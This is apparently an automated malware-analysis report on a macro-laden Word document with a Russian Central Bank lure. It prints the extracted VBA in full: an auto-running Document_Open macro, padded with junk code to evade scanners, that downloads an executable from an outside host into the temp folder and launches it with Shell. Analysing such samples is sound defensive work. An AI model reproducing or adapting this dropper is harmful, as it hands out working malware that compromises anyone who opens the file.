MALICIOUS
248
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
T1204.002 Malicious File
The sample is an OOXML document containing VBA macros. The critical heuristic 'OLE_VBA_HTTP_DROP_EXEC' indicates that the VBA code downloads a file from an HTTP source and saves it to disk. The 'OLE_VBA_SHELL' and 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristics further suggest that this downloaded file is likely executed. The document body contains text related to a Russian Central Bank agreement, which may be a lure.
Heuristics 10
-
VBA project inside OOXML medium 7 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Shell hHVWpQiqNv2 -
VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXECVBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.Matched line in script
dA3BGSOFn.Write U9SpqCLxntTo3GJ.responseBody -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set dA3BGSOFn = CreateObject("adodb.stream") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Sub Document_Open() -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
'Sub Workbook_Open() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
path = Environ("temp") & "\20729.exe" -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL https://msoffice.host/winhost.exe Referenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasReferenced by macro
- http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2012/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
- http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 16411 bytes |
SHA-256: dd594a57d01d4b7f1fe77d13737b992496442be61a1980a83d9b78239139ba37 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
327 of 460 identifiers look randomly generated (e.g. 'Z7n14v2SHlGPiwk9g') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
If 939 - 35 = 14495 / 1115 Then
UmaW34FE2CdbQI = "C2p6Ld1Blrw7PzW"
End If
NRPkzmVq8uK = 22641
xQEujIvpURl5 = UmaW34FE2CdbQI & NRPkzmVq8uK
If 149 + 29 = 7620 / 508 Then
s0yYhIdG1wefcQu = "OKN5tT7OZqP"
End If
j8nEjHiwz6pQqX = "FElTm0f2UnRp3MH"
o62GBfU5pHWSl4r0e = s0yYhIdG1wefcQu & j8nEjHiwz6pQqX
If 46 < 140 Then
' Qb20jIhM8V
Else
' PhM1aSOHr
MsgBox "icHDZ0ugsax"
End If
main
End Sub
Sub Document_Close()
If 54 < 252 Then
' Qv0ZYltif3KHCr
Else
' uoLykeTlW
Debug.Print "HKu17JP4VDY"
End If
Dim QnO8QkI9btL
QnO8QkI9btL = 169
While QnO8QkI9btL < 452
QnO8QkI9btL = QnO8QkI9btL + 11
Wend
s7LyaURJuX4VYqit = 31649
bGqT53n8AFBS = ROrHwqmy2 & QnO8QkI9btL
If 41 < 248 Then
' gpjkgiET1
Else
' n1fRpMzkU8nuv5w
Debug.Print "Ki36Wre15zQSU"
End If
End Sub
Attribute VB_Name = "frVc5K7Wdpit"
'Sub Workbook_Open()
Sub main()
If 204 - 20 = -2012 + 2023 Then
voS7ybcQl3 = "dYCW4D07qtR9Zsa"
End If
b64GxtZ18 = 11300
hcUuOXpvmPN1 = voS7ybcQl3 & b64GxtZ18
If 204 - 20 = -2012 + 2023 Then
b5NthjG7qL4DP = "z0azO7ZVdDY"
End If
amHqKDftyvu0QG = 11300
vs0f9vWO2nS6Lk = b5NthjG7qL4DP & amHqKDftyvu0QG
If 30784 / 104 = 9150 - 9148 Then
GoaAnHrCLJ80eW = "Pvf3R9N8GB"
End If
hxsauD489vOer = 40433
gmeMBiHIaAzK8b = GoaAnHrCLJ80eW & hxsauD489vOer
Dim mX6ie3bHx5Edusjk
mX6ie3bHx5Edusjk = 237
While mX6ie3bHx5Edusjk < 567
mX6ie3bHx5Edusjk = mX6ie3bHx5Edusjk + 56
Wend
PdF97nrUeZ = 36410
X1noryxaHi = SDaBVxWd6pZQy5Mk & mX6ie3bHx5Edusjk
If 5536 / 8 = 23229 / 2581 Then
C2DF8dNoW53 = "pFfn0N6dr"
End If
PvOU1lHZo7WTj = "EJsS86LDxYM"
KSDy1eJaZ4pjt = C2DF8dNoW53 & PvOU1lHZo7WTj
If 767 - 10 = 23024 / 5756 Then
go4IaOwhJ = "ofMUGTl062I"
End If
sWybfV2a1rzsIvHX = 21459
bNJltvOPGwS3nF = go4IaOwhJ & sWybfV2a1rzsIvHX
If 13440 / 21 = -1615 + 1625 Then
mh7dsnMIz1Ek84 = "a8RcBWAQjEqKT"
End If
eFE8qUlfT = "rlHwEDTVi7tL"
gnSh7wsDL6G5Vv = mh7dsnMIz1Ek84 & eFE8qUlfT
If 13440 / 21 = -1615 + 1625 Then
EEh1AKNqdTUDu = "wquOYkJUMzmWo8C"
End If
GJLfAYPMiWO1 = "XbMuCFTR5ht"
ixQEVBZov = EEh1AKNqdTUDu & GJLfAYPMiWO1
Dim QCNJFfndIDY9ptyB
QCNJFfndIDY9ptyB = 177
While QCNJFfndIDY9ptyB < 842
QCNJFfndIDY9ptyB = QCNJFfndIDY9ptyB + 1
Wend
KSgGzc1qI4XUnwkA = "TuGsWVoXPt1Qy"
mdcl5JUPahBG = aFGLCj4VR & QCNJFfndIDY9ptyB
If 16 < 216 Then
' Sr9gylLSxvQE5dJN
Else
' xVqMiWjCxEa
MsgBox "aNj8yVRA1PdJBM"
End If
Dim AMN3j2YkFt6xS5g
AMN3j2YkFt6xS5g = 245
While AMN3j2YkFt6xS5g <= 345
AMN3j2YkFt6xS5g = AMN3j2YkFt6xS5g + 54
Wend
D2m6Ba9KbYFyO = 23071
Zse4jioLgxW9mh1u = AxH3sh10aGCQN & AMN3j2YkFt6xS5g
Dim tJ0d9BVbvXq
tJ0d9BVbvXq = 245
While tJ0d9BVbvXq < 345
tJ0d9BVbvXq = tJ0d9BVbvXq + 54
Wend
pTu6ck0NbmVKzeDl = 23071
g0nMWyHZdJCNDXP = Eq5XjISihk4N0L6 & tJ0d9BVbvXq
If 47 < 215 Then
' QG5Y9TOSpnNqu
Else
' ROEqkRNnm
MsgBox "aX1qrMnHLEivy"
End If
If 47 < 215 Then
' ZNHJ0LICPZY9v
Else
' QoRe4f1D2PYlIdz
MsgBox "Vx40BE3OTc2SmN6"
End If
If 8 < 202 Then
' j1EiFoVDYsrl
Else
' nuV23SGt16Ibm
MsgBox "QeiaTVrmM"
End If
Dim Z7n14v2SHlGPiwk9g
Z7n14v2SHlGPiwk9g = 110
While Z7n14v2SHlGPiwk9g <= 725
Z7n14v2SHlGPiwk9g = Z7n14v2SHlGPiwk9g + 44
Wend
JQYj3XsyLC0z = 17933
i7EHGuB3vUdWR = Bf1gtYdyCuPJa & Z7n14v2SHlGPiwk9g
If 50 < 154 Then
' N1xN7j2SpFrm6LMa
Else
' I846sFZOmANb
MsgBox "l9brqletQCiK"
End If
Dim ZebBWzE5dJCxk0
ZebBWzE5dJCxk0 = 219
While ZebBWzE5dJCxk0 < 432
ZebBWzE5dJCxk0 = ZebBWzE5dJCxk0 + 51
Wend
XoNbHyhpP0ScJldzI = 47833
ctYJXiQmvbzj2c = UNkToOGB5Wv3VbSAd & ZebBWzE5dJCxk0
If 317 - 171 = 1237 - 1227 Then
cGwOaRzqQ3 = "Q3lkMg6LaHc402j"
End If
as7EytinH6 = 59584
u3Xd9fwZFzP5o = cGwOaRzqQ3 & as7EytinH6
If 317 - 171 = 1237 - 1227 Then
HraWhkY63 = "fEKMj67PpZI"
End If
vb9BQEiS1pNzZHj6l = 59584
y7tmYI6r5JZkWvibq = HraWhkY63 & vb9BQEiS1pNzZHj6l
If 878 + 9 = -1306 + 1322 Then
G89nT1IFPi = "neorDZgiVvjtGM"
End If
l7EV3y0TbvnN1aC6 = 53363
gwfIi6jSdrR = G89nT1IFPi & l7EV3y0TbvnN1aC6
If 49 < 210 Then
' vKwRh1cmaA
Else
' xMgkJnpQD
Debug.Print "xpQq2Wln4Gs5jaZ"
End If
If 46 < 247 Then
' nGNz4Hqt3JPsbgU5o
Else
' xlm7ov9pXi0qr4E
MsgBox "NJ2qrUVyLKA"
End If
Dim t0n7lfo5CtBZLRS
t0n7lfo5CtBZLRS = 166
While t0n7lfo5CtBZLRS <= 516
t0n7lfo5CtBZLRS = t0n7lfo5CtBZLRS + 21
Wend
v0qxIPUmVN57ZA = 24444
Nzs4lUfOnwXWiVc = duXfUMh0xCSye9wkG & t0n7lfo5CtBZLRS
If 13 < 246 Then
' bIFTSvJgihap7R
Else
' L5yAmY4OhPs1d
MsgBox "kaU1EpDgcseFr752"
End If
If 13 < 246 Then
' T3ntfQd0coY
Else
' DBCtW5xu4TU
Debug.Print "TfOdBN7EGLnarS"
End If
If 48 < 237 Then
' RctJ74OTQkB
Else
' EB7XGUyMjR8bl
Debug.Print "ZJoZeF8tjVzs3"
End If
Dim dWbdDnRlUZ6
dWbdDnRlUZ6 = 219
While dWbdDnRlUZ6 <= 838
dWbdDnRlUZ6 = dWbdDnRlUZ6 + 13
Wend
FpBmcQEtz = "NrkKRzafNLps"
pJiHW4wEN = iXrQvxp8c9CVRST & dWbdDnRlUZ6
If 21090 / 38 = 24345 / 4869 Then
orlu6DbopCsd = "q6ky5wln7Jsg"
End If
rvMTGh0YVw = "LeOBDxWUK"
zgZlT85cUL = orlu6DbopCsd & rvMTGh0YVw
Dim m7D12Nzh0rCT
m7D12Nzh0rCT = 161
While m7D12Nzh0rCT < 838
m7D12Nzh0rCT = m7D12Nzh0rCT + 62
Wend
NjfFE5C6r = 59536
p5vidNfE1 = xIBwZnMy6HPe9t & m7D12Nzh0rCT
Dim K1HasfMiA
K1HasfMiA = 98
While K1HasfMiA <= 857
K1HasfMiA = K1HasfMiA + 11
Wend
W8WYeMiTyFPp1mI = 38501
gf52oURlecysLj = eTrtIg9wOmSZf & K1HasfMiA
If 73 + 94 = -2114 + 2117 Then
Xikqz3JFgLbh15m = "n3YPdXKihLMx0"
End If
Q83ASoqcHu = "sBALHqrVa"
NkD0cifoGmJL = Xikqz3JFgLbh15m & Q83ASoqcHu
If 62 < 134 Then
' IAxXasWmfhF3NrKd
Else
' xholxz1Zeq29a
MsgBox "LJDOerbzpvf0s"
End If
Dim Lq4kX61oUTziMgH
Lq4kX61oUTziMgH = 228
While Lq4kX61oUTziMgH < 734
Lq4kX61oUTziMgH = Lq4kX61oUTziMgH + 22
Wend
vOQJgpjlI = "iGMaoNW62C5"
TSNMZCyA4b7su58 = RBVLW0Dxd4kaG & Lq4kX61oUTziMgH
Dim fsoZVGmQR
fsoZVGmQR = 16
While fsoZVGmQR < 812
fsoZVGmQR = fsoZVGmQR + 61
Wend
Tnhw5dkCORTeQ = "oLJn68cQu9i1yT"
DEtAdZDlHbx0vm9Q = CdAZxnEjmbkg5R & fsoZVGmQR
If 16536 / 53 = 28392 / 7098 Then
wd1CjU7erN8 = "WLPaTOc2ku9p"
End If
pBxpL3KvT0ED2aVw = 41511
tgJ9dVWAu0qMbcD = wd1CjU7erN8 & pBxpL3KvT0ED2aVw
If 16536 / 53 = 28392 / 7098 Then
c8WAhx2eFdnV = "ivDxBF4lYc1pgoS"
End If
c9DJ14OoLmTH7g = 41511
e5hjsWQCo = c8WAhx2eFdnV & c9DJ14OoLmTH7g
Dim pRQNr0tIUYPMGwHB
pRQNr0tIUYPMGwHB = 2
While pRQNr0tIUYPMGwHB < 923
pRQNr0tIUYPMGwHB = pRQNr0tIUYPMGwHB + 48
Wend
j9OxlJkZSKQa = 13956
J8FUlcLKofN = TtLzjPuIS & pRQNr0tIUYPMGwHB
If 444 + 40 = -835 + 842 Then
xzg5TGtYsNu = "YtgiTZlUkc"
End If
a9oaAJ6CU = 13956
a6vo2741RdSlCAQsu = xzg5TGtYsNu & a9oaAJ6CU
Dim s9vUxI2i8dKQTYAO
s9vUxI2i8dKQTYAO = 206
While s9vUxI2i8dKQTYAO < 587
s9vUxI2i8dKQTYAO = s9vUxI2i8dKQTYAO + 19
Wend
V6YHXkLKae0dJg78A = "vb4gQeDM9jU7FvZN1"
zawNfYeBopK47LkU = OeiEkS6AquGcJIZn & s9vUxI2i8dKQTYAO
If 1002 + 13 = -1344 + 1358 Then
dRvXf9Ed8ogyO5hC = "SveSzqBu19NMoAC"
End If
cfSdtGIrXoqZgpWm = 8017
qMq5SPnU0KTOwDNb8 = dRvXf9Ed8ogyO5hC & cfSdtGIrXoqZgpWm
Dim VVHpXrYztDxTig
VVHpXrYztDxTig = 119
While VVHpXrYztDxTig < 561
VVHpXrYztDxTig = VVHpXrYztDxTig + 1
Wend
rlXe1IRLgh8DQC = "bUFJ2OcaCmXNur7e"
rOC3kKTB6IRaq = Ga2PMWHl1 & VVHpXrYztDxTig
Dim yLUp6t3mqjcRfa0zK
yLUp6t3mqjcRfa0zK = 104
While yLUp6t3mqjcRfa0zK <= 345
yLUp6t3mqjcRfa0zK = yLUp6t3mqjcRfa0zK + 3
Wend
u3t6ZfJwVlOYMi = "RDkLjVPxd"
Z4OqCwWhrfc1SVmk = WqnxspbEr8 & yLUp6t3mqjcRfa0zK
If 18 < 182 Then
' hlq75wdhtE
Else
' zWlqUAaD1yRfp
Debug.Print "p23C9fFA5yQ"
End If
If 18 < 182 Then
' bAM1OPb4iNsuvjeF2
Else
' AnkQGD2Bx7
Debug.Print "SD9YWAouawSkKGM"
End If
Dim khmWqgLU6CAjDtYFw
khmWqgLU6CAjDtYFw = 225
While khmWqgLU6CAjDtYFw < 478
khmWqgLU6CAjDtYFw = khmWqgLU6CAjDtYFw + 64
Wend
n3u7IQGNc = "GCwgisukS5896h"
omTJlba7e9XM = lDtT10fk4a8v & khmWqgLU6CAjDtYFw
Dim DzhUQvc07L
DzhUQvc07L = 143
While DzhUQvc07L < 630
DzhUQvc07L = DzhUQvc07L + 48
Wend
xKHYvlJ3uSi = 2592
bY3a1cfiE = djVBaCYkS3md9lJKr & DzhUQvc07L
If 2040 / 3 = 885 - 870 Then
DkrtEcoR27fi4 = "KLB0Z5FmreCVji"
End If
tktQqNazi4 = "ssQTOoHqSpBRcI"
qWv7sUYl1 = DkrtEcoR27fi4 & tktQqNazi4
If 2040 / 3 = 885 - 870 Then
PafmJScOYxDP7M2 = "nCWXZL4UtT1Daf"
End If
MV3HOqw4iZatg = 43720
rfBNHVQyX0x = PafmJScOYxDP7M2 & MV3HOqw4iZatg
Dim h5Nv8bhcZRH6Piw9
h5Nv8bhcZRH6Piw9 = 163
While h5Nv8bhcZRH6Piw9 < 746
h5Nv8bhcZRH6Piw9 = h5Nv8bhcZRH6Piw9 + 35
Wend
AOgSrUh85bWQX = "MjmtpHgMaTRoW7Vq"
jXTNiUJG6C4f = utxnLOS9By5ei1ZwD & h5Nv8bhcZRH6Piw9
If 18901 / 41 = 11708 / 2927 Then
OEy7CVRepTwzsH4m = "nhV0bjJT3f8"
End If
y5SXOcCtq9UbJ4V = "QB4KrwzRNpj"
sSyheBAUzaJZ5O8 = OEy7CVRepTwzsH4m & y5SXOcCtq9UbJ4V
If 766 - 19 = 5027 / 457 Then
L3A5d827u = "hHSQ7vZFmrz2O"
End If
bE3D0r7JGkNlWZw = 38742
v8QvNifSKXyuYwJB = L3A5d827u & bE3D0r7JGkNlWZw
If 63 < 175 Then
' qy3H6Wpi8
Else
' VuE9PUSsJnmoWb0kK
Debug.Print "BFnkjSqyVTKQJaEw"
End If
If 12 < 207 Then
' nes9SyGCT3NIEnioq
Else
' Of5labWHmyD
MsgBox "IIwqxvZkGs"
End If
Dim dSAFiHK80JN5gYcU
dSAFiHK80JN5gYcU = 12
While dSAFiHK80JN5gYcU <= 548
dSAFiHK80JN5gYcU = dSAFiHK80JN5gYcU + 3
Wend
ithmT8ExzXj41FN = 2213
OukOfpohl = g6SUCFKPWkyshVA & dSAFiHK80JN5gYcU
Dim ZYloWNq4sj
ZYloWNq4sj = 237
While ZYloWNq4sj < 341
ZYloWNq4sj = ZYloWNq4sj + 38
Wend
Cgj1a2GJw40tFUHCb = "nVTDHSc3tewj"
jrdceX4ZWSOsyJ5iV = z9taXhD1zjuC2pfe & ZYloWNq4sj
If 801 - 11 = -8924 + 8927 Then
bqzJyuMkUfSQrLO = "hpz0eTkWF"
End If
FbeEDXPJWcIv9ljm = 29304
a6nreuhtTYxH1 = bqzJyuMkUfSQrLO & FbeEDXPJWcIv9ljm
Dim isifuQemktabPMg0
isifuQemktabPMg0 = 199
While isifuQemktabPMg0 < 298
isifuQemktabPMg0 = isifuQemktabPMg0 + 39
Wend
DM69mabL4TYqpHj = "l3XuzjVaOL"
A3vPaLXH0Ch = TnqKgSQVMlp0A & isifuQemktabPMg0
Dim TWU0KVFIius
TWU0KVFIius = 199
While TWU0KVFIius < 298
TWU0KVFIius = TWU0KVFIius + 39
Wend
PgsMfqWyDox5 = "ayAH716skPTR"
A6dObHPnrFYqCN72f = dnX4WTOpxUtbw10s & TWU0KVFIius
Dim YAw9uxyQG
YAw9uxyQG = 244
While YAw9uxyQG < 263
YAw9uxyQG = YAw9uxyQG + 31
Wend
MTJDvhGYHFgoWflB6 = 64890
GXnSbwMCKI8Diopr = d2NmU7i6LQ & YAw9uxyQG
path = Environ("temp") & "\20729.exe"
BLyc024BsnIqioW "https://msoffice.host/winhost.exe", path
If 27 < 236 Then
' ytvUkX3Baeu8
Else
' g4PsJkfVA
MsgBox "A9AfZeYUdg1Lsm3p"
End If
Dim wYBSHvzy7CAOTqs
wYBSHvzy7CAOTqs = 110
While wYBSHvzy7CAOTqs <= 289
wYBSHvzy7CAOTqs = wYBSHvzy7CAOTqs + 11
Wend
qEJzsN8GqZ = "J4F7EMUGRViLDXlaZ"
kjKxhgSW97aN03 = aQ6Tu4SwDE3zL8h & wYBSHvzy7CAOTqs
If 22880 / 130 = 13793 / 1061 Then
Ir4KxJiTXcB7un = "Cpb4QUoEqgxmC2I6"
End If
wuQkmWXEeftBjpCV = "tPfDAONHd1lLtFB"
YWpylbMrkZ6Dif = Ir4KxJiTXcB7un & wuQkmWXEeftBjpCV
If 22880 / 130 = 13793 / 1061 Then
WHKgr38Tc = "AiQqWFmc3JYu18"
End If
S7lFvtIkc4qS = 10144
OhwrIPfZyqK = WHKgr38Tc & S7lFvtIkc4qS
Dim oDtlSYCsX5cTqnBi0 As Object
If 1 * 148 = 17800 / 3560 Then
Pfe5JmRYlKEp1CQ = "Mji9VCl0XW"
End If
edPbLizjW = "UipCxn8cHYZO"
u3wpMRkJZQt9zao = Pfe5JmRYlKEp1CQ & edPbLizjW
Set oDtlSYCsX5cTqnBi0 = New frmMain
If 11 < 210 Then
' CNUivYxSXzF6jL0M
Else
' Wln1qFyT6XJERrf
Debug.Print "ICvdx5YO1"
End If
If 11 < 210 Then
' JVcFq4o7WSus9ny
Else
' lu3zCP015XWOn
Debug.Print "YhkbJ0SIg3"
End If
oDtlSYCsX5cTqnBi0.hello path
End Sub
Attribute VB_Name = "DxoSn0F7BEhYJ"
Public Function BLyc024BsnIqioW(ByVal rar0MEfPtZAK$, ByVal RIkvxta5XBosg$)
Dim LIwBLG7tar3
LIwBLG7tar3 = 181
While LIwBLG7tar3 < 891
LIwBLG7tar3 = LIwBLG7tar3 + 44
Wend
ErLNxFUXOl = "Qq0KPpRzi"
HAMgXbsykG = Urc2Bh8VonXySejF & LIwBLG7tar3
If 8559 / 9 = -2162 + 2163 Then
u8gwGbX9CdF6YTZH = "JB7HbIqpNRU"
End If
Oyt1XDibugrm0P23 = "BB5fElL1TQY0"
csyPAM7mg2cfehn = u8gwGbX9CdF6YTZH & Oyt1XDibugrm0P23
If 33 < 203 Then
' OE8jluiM3b
Else
' ekjIJKbSQE4Olhw
Debug.Print "seOgFoDAUZnKG96uw"
End If
Dim anfz7uRd8H
anfz7uRd8H = 100
While anfz7uRd8H < 595
anfz7uRd8H = anfz7uRd8H + 35
Wend
oCd8GHBPN4Oe2Z9S = "h2ygTqi0a"
F6R1NVj3dUMKq5 = ZftaXsgbOhIvH4 & anfz7uRd8H
Dim LsGH29OR1
LsGH29OR1 = 100
While LsGH29OR1 < 595
LsGH29OR1 = LsGH29OR1 + 35
Wend
kYa16Ulip2 = "gLsmlYiaZQTo"
vIzQdH8ltepo3bvi = d98dR4k62elqS & LsGH29OR1
If 54 < 173 Then
' VzZFBbG0u
Else
' CKyq52i7Wo
Debug.Print "E3HhqNZbDIY"
End If
If 44 < 187 Then
' fcYCJ8T130DrGyB
Else
' er8ByAPgI45m
MsgBox "oRE4p9XzyVu"
End If
Dim I9LV2n7Rh
I9LV2n7Rh = 117
While I9LV2n7Rh < 946
I9LV2n7Rh = I9LV2n7Rh + 14
Wend
fzi15pEbPuf7RUrnD = 21283
L7IX1N0ntMHcQVsq = SUTZl92nv & I9LV2n7Rh
If 49 < 131 Then
' blpajcoU45V
Else
' umybWAfZp4
Debug.Print "xlWqsgz8FJfa7Mwpu"
End If
If 26 < 178 Then
' adoYUv4ZNi0ujxLD
Else
' X8l9c4fnvS
Debug.Print "cPbTeFSBDQvtO5zEM"
End If
If 26 < 178 Then
' bJ1u7l60Lf3VGm8jD
Else
' UOGJrblWkwedcq
MsgBox "fySfk6KAzUleTM"
End If
Dim Cp7Ys4nOH
Cp7Ys4nOH = 100
While Cp7Ys4nOH < 270
Cp7Ys4nOH = Cp7Ys4nOH + 9
Wend
QPNphYv1L = 9863
TnEzPDhWQ0tC1vsm = F4oMQ6GgU0 & Cp7Ys4nOH
If 16 < 179 Then
' lms0cMyTkE
Else
' EdvZPnpl3GzDyO
Debug.Print "b7KlzTr8CG1"
End If
If 2616 / 3 = 10140 / 780 Then
UxpgvSNc3yQounCE = "RpQJMzNIKqyr"
End If
gOUIhVB5F29SNe = "ePpR9is1wkomGUa"
OET0MUOC4RWyl3QdZ = UxpgvSNc3yQounCE & gOUIhVB5F29SNe
If 31 < 138 Then
' B9ihp0vyEPGLXeHxC
Else
' ZBIR7KZzWA3H9PV
Debug.Print "MOjI52Mtrw4v"
End If
Dim mNVjQmJglfypb
mNVjQmJglfypb = 132
While mNVjQmJglfypb < 854
mNVjQmJglfypb = mNVjQmJglfypb + 21
Wend
P2tmRhZSnj = 48618
jUk6mqEYs0fv = MoMtOscK4we & mNVjQmJglfypb
If 570 + 39 = 6299 - 6295 Then
RcgGStbjC1BU = "xEvOS1cAtQf"
End If
VXIw7fRWFosTvkY = 48618
pAwCrshuLJRDaEG = RcgGStbjC1BU & VXIw7fRWFosTvkY
If 23 < 201 Then
' f3KPRQa9vC5Ngu
Else
' IrMVf5iRydWgK
MsgBox "iI86sRUaYXzP1C"
End If
If 23 < 201 Then
' kinLl1G49qg
Else
' zOy2mXYFUk0d9tP
Debug.Print "UhqoECTpiLSRc"
End If
Dim U9SpqCLxntTo3GJ As MSXML2.XMLHTTP60
Set U9SpqCLxntTo3GJ = New MSXML2.XMLHTTP60
U9SpqCLxntTo3GJ.Open "GET", rar0MEfPtZAK$, False
U9SpqCLxntTo3GJ.Send
If U9SpqCLxntTo3GJ.Status = 200 Then
If 19 < 225 Then
' Ngh2TDw4fpyXeq
Else
' ThIZBOCJf
MsgBox "OgYwxakWZ5V28u"
End If
Dim vyealI82b
vyealI82b = 253
While vyealI82b <= 684
vyealI82b = vyealI82b + 61
Wend
ZXyhUL2PHMS = 60714
Kt1U4pqkOPc = u86ZnD1KTgB & vyealI82b
Set dA3BGSOFn = CreateObject("adodb.stream")
If 22 < 235 Then
' NJ36Nsmzy
Else
' KqelmzPgY7W
MsgBox "pNqdg2VMLlRWQXK"
End If
dA3BGSOFn.Type = 1: dA3BGSOFn.Open
Dim lewcKg5k3siE
lewcKg5k3siE = 147
While lewcKg5k3siE <= 524
lewcKg5k3siE = lewcKg5k3siE + 63
Wend
bcqzbei5Ng = 30953
MGZiSrXMvIA = uPBSGxMdDeO & lewcKg5k3siE
dA3BGSOFn.Write U9SpqCLxntTo3GJ.responseBody
If 64 < 161 Then
' tUukGIPJha2b
Else
' NBIbPQTlS
MsgBox "OlGOUMQ0q8K"
End If
Dim lL6oz4TAePmjvBKlS
lL6oz4TAePmjvBKlS = 55
While lL6oz4TAePmjvBKlS <= 261
lL6oz4TAePmjvBKlS = lL6oz4TAePmjvBKlS + 14
Wend
j5aAgJZ70KB = "Xa7CdxpmOGK"
nPVMHA85pWamt = OFCxfnSMk & lL6oz4TAePmjvBKlS
Dim cb9kmfaFyKJc
cb9kmfaFyKJc = 15
While cb9kmfaFyKJc <= 647
cb9kmfaFyKJc = cb9kmfaFyKJc + 20
Wend
kueCA28d1rWfZ5cQD = "nDHor3GvLfaTI46"
fwAVj3yrtJHPOMfo = QOKnhUmYH & cb9kmfaFyKJc
If 22 < 253 Then
' CuXhLs31UizQP6p
Else
' ANonmvtReGE
MsgBox "IeYOgyLvrhB0nQ"
End If
dA3BGSOFn.SaveToFile RIkvxta5XBosg$, 2
If 36 < 234 Then
' oXpVu5NIyo
Else
' F5shXZqjbM6TBfOIW
MsgBox "cX2UpL0EKCW"
End If
If 30 < 170 Then
' xXUZEYTF7Ppe2Dats
Else
' aZTQzpgtR
MsgBox "lMnr8NwCp"
End If
If 30 < 170 Then
' TQjYvENVDb
Else
' cA7UZwn8P
Debug.Print "x08zMHYI5bD"
End If
dA3BGSOFn.Close: Set dA3BGSOFn = Nothing
End If
Dim WvpL4YQgyzFtn3
WvpL4YQgyzFtn3 = 202
While WvpL4YQgyzFtn3 <= 831
WvpL4YQgyzFtn3 = WvpL4YQgyzFtn3 + 10
Wend
I7aednM3r4KwVLyP = 58923
kVa5iXzn1pRG2c4 = JhSdbRMv3UZ & WvpL4YQgyzFtn3
If 573 - 19 = 2351 - 2341 Then
mFkEXCmqyIn = "GMBTEnPfH9"
End If
RvVed6rZFns = "k7Ir2JXqGhdEy"
K5cX2nZIib = mFkEXCmqyIn & RvVed6rZFns
Set U9SpqCLxntTo3GJ = Nothing
End Function
Attribute VB_Name = "frmMain"
Attribute VB_Base = "0{E3AD96BE-6CE3-4777-A377-C84F06DA5BF3}{5E25C0BD-621B-43A3-BDB3-A31AFF284BBA}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub UserForm_Initialize()
' Initialize
Me.Caption = ""
End Sub
Public Sub hello(hHVWpQiqNv2)
Shell hHVWpQiqNv2
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 54784 bytes |
SHA-256: 0a68d63879a2f54f2e2600209481e7134872bb3d09005994ea7a1571cbbb3dc5 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
623 of 1056 identifiers look randomly generated (e.g. 'aW9uIHVsbGFtY28gbGFib3JpcyBuaXNpIHV0IGFs') — consistent with name-mangling obfuscation. Carved artifact contains 2 long base64-like blob(s).
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.